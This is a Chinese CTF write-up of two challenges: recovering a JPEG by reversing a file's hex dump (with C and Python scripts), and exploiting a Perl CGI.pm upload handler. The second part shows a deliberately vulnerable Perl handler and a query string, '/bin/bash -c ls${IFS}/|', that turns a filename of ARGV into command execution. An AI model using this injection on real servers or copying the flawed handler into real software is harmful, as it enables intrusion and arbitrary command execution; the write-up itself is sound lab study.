CTF每日一题-Day6


D6 T1 Reverse-it

本来打算做pwn1的,结果卡住了,先做道misc

下载下来用 file 看是 data,binwalk 也没有结果,用 WinHex 打开也没什么头绪

突然想到题目叫 Reverse-it:文件尾的 8D FF 按十六进制字符倒过来就是 FF D8,正是 JPG 文件的文件头。注意这是按十六进制字符(半字节)倒序,如果只按字节倒序得到的是 FF 8D,所以倒序的同时还要交换每个字节的高低半字节

写个脚本把文件整体倒一下

随手写了个这个

#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
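/*
 * Swap the high and low nibbles of one byte (0x8D -> 0xD8).
 *
 * The arithmetic is done on unsigned char so the shifts never involve a
 * sign bit; the result is handed back in the caller's char type.
 */
char swap(char c)
{
    unsigned char u = (unsigned char)c;
    return (char)(((u & 0x0f) << 4) | (u >> 4));
}

/*
 * Reverse the hex-digit string of s[0..len): the byte order is reversed and
 * every byte's nibbles are swapped, which is the same result as reversing
 * the file's hex dump character by character.
 *
 * s   - buffer modified in place
 * len - number of bytes; len <= 0 is a no-op
 *
 * For an odd len the middle byte stays in place but its nibbles must still
 * be swapped; the original loop stopped before it and left it untouched.
 */
void reverse(char *s, int len)
{
    int lo = 0;
    int hi = len - 1;

    while (lo < hi) {
        char tmp = swap(s[lo]);
        s[lo] = swap(s[hi]);
        s[hi] = tmp;
        lo++;
        hi--;
    }
    /* Odd length: one byte was never paired, swap its nibbles alone. */
    if (lo == hi) {
        s[lo] = swap(s[lo]);
    }
}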
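/*
 * Read file "a", reverse its hex dump (see reverse()) and write the result
 * to "b.jpg".
 *
 * The input length is taken from the file itself instead of the hard-coded
 * 7698 of the original, every library call is checked, and the buffer and
 * both streams are released on every path.  Returns EXIT_SUCCESS, or
 * EXIT_FAILURE after a diagnostic on stderr.
 */
int main(void)
{
    int rc = EXIT_FAILURE;
    FILE *in = NULL;
    FILE *out = NULL;
    char *buf = NULL;
    long size = 0;
    size_t got;

    in = fopen("a", "rb");
    if (in == NULL) {
        perror("fopen a");
        goto cleanup;
    }

    /* Size the buffer from the file rather than guessing a constant. */
    if (fseek(in, 0, SEEK_END) != 0 || (size = ftell(in)) < 0 ||
        fseek(in, 0, SEEK_SET) != 0) {
        perror("ftell a");
        goto cleanup;
    }
    /* reverse() takes an int length; refuse what it cannot represent. */
    if (size == 0 || size > INT_MAX) {
        fprintf(stderr, "a: unsupported size %ld\n", size);
        goto cleanup;
    }

    buf = malloc((size_t)size);
    if (buf == NULL) {
        perror("malloc");
        goto cleanup;
    }

    got = fread(buf, 1, (size_t)size, in);
    if (got != (size_t)size) {
        fprintf(stderr, "a: short read (%zu of %ld bytes)\n", got, size);
        goto cleanup;
    }

    reverse(buf, (int)size);

    out = fopen("b.jpg", "wb");
    if (out == NULL) {
        perror("fopen b.jpg");
        goto cleanup;
    }
    if (fwrite(buf, 1, (size_t)size, out) != (size_t)size) {
        perror("fwrite b.jpg");
        goto cleanup;
    }
    /* fclose flushes the stream; a failure here means b.jpg is incomplete. */
    if (fclose(out) != 0) {
        perror("fclose b.jpg");
        out = NULL;
        goto cleanup;
    }
    out = NULL;
    rc = EXIT_SUCCESS;

cleanup:
    free(buf);
    if (out != NULL) {
        fclose(out);
    }
    if (in != NULL) {
        fclose(in);
    }
    return rc;
}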

勉强能跑出来

~~忘记是按字节倒的了~~(脚本已更新:最初的版本只做了字节倒序,没有交换半字节,所以得不到 FF D8;上面这版在倒序的同时用 swap() 交换了每个字节的高低半字节)

其实把文件导出成十六进制字符串,整个字符串直接倒序一下就可以了,效果和上面的 C 代码完全一样

用python

a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

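# `a` is the hex dump of the challenge file as one string (defined above).
# Reversing it character by character flips both the byte order and the two
# hex digits inside each byte, so the trailing "8dff" becomes the JPEG
# start-of-image marker "ffd8".
b = a[::-1]

# Print the reversed dump.  The original printed `str` -- the builtin type,
# not the result -- which just outputs "<class 'str'>".
print(b)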

b.jpg

拿到这张图,用画图工具翻转一下就可

D6 T2 i-got-id-200

用perl写的网站

然而我不会perl......

有个文件上传界面

上传完会把文件里的东西以文本格式读出来显示在页面上

还是先抓个包看看

POST /cgi-bin/file.pl HTTP/1.1
Host: 111.198.29.45:57795
Content-Length: 292
Cache-Control: max-age=0
Origin: http://111.198.29.45:57795
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDYZHzjAneIJ2wk7a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://111.198.29.45:57795/cgi-bin/file.pl
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=pqnmaqdihhvciqqc9uhaeod893
Connection: close


------WebKitFormBoundaryDYZHzjAneIJ2wk7a
Content-Disposition: form-data; name="file"; filename="233.txt"
Content-Type: text/plain

23333333
------WebKitFormBoundaryDYZHzjAneIJ2wk7a
Content-Disposition: form-data; name="Submit!"

Submit!
------WebKitFormBoundaryDYZHzjAneIJ2wk7a--
HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 13:57:38 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 564
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
    <head>
        <title>Perl File Upload</title>
        <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    </head>
    <body>
        <h1>Perl File Upload</h1>
        <form method="post" enctype="multipart/form-data">
            File: <input type="file" name="file" />
            <input type="submit" name="Submit!" value="Submit!" />
        </form>
        <hr />
23333333<br /></body></html>

查阅资料发现 Perl CGI.pm 的文件上传处理有一个很经典的漏洞(参考资料里的 The Perl Jam 2),和这道题的情形类似

# Minimal CGI.pm upload handler that echoes the uploaded file back as text.
use strict;
use warnings;
use CGI;
my $cgi = CGI->new;
if ( $cgi->upload( 'file' ) ) {
    # param('file') yields the client-supplied *file name* as a plain
    # string, not the filehandle that upload('file') returns (see the
    # referenced talk).
    my $file = $cgi->param( 'file' );
    # VULNERABLE: <$file> on a string is only meaningful when the string is
    # "ARGV"; it then behaves like the diamond operator and hands every
    # value in @ARGV to a two-argument open(), which also treats a trailing
    # "|" as a pipe.  Reading from the handle returned by upload('file')
    # instead of the param() string avoids this.
    while ( <$file> ) {
        print "$_";
    }
}

问题就出在这个 <$file> 上:$cgi->param('file') 返回的是上传时客户端给出的文件名字符串,而不是文件句柄,所以 <$file> 实际上是在对一个字符串做 <> 读取

  • “<>” doesn’t work with strings

    • Unless the string is “ARGV”
  • In that case, “<>” loops through the ARG values

    • Inserting each one to an open() call!

所以按参考资料的做法,把上传时的 filename 改成 ARGV,$cgi->param('file') 返回的就是字符串 "ARGV",<$file> 退化成 <>,它会把 URL 查询串里的每个值依次交给 open();这样就可以任意读文件,而且由于是两参数 open(),值末尾带 | 时还会当作管道去执行命令
根据参考资料中的ppt我们甚至可以用bash遍历一下目录

/cgi-bin/file.pl?/bin/bash%20-c%20ls${IFS}/| #遍历根目录

找到flag

用同样的方法把 flag 文件的路径作为查询串传入,直接读一下即可

参考资料

Perl CGI 问题:https://www.blackhat.com/docs/asia-16/materials/asia-16-Rubin-The-Perl-Jam-2-The-Camel-Strikes-Back.pdf
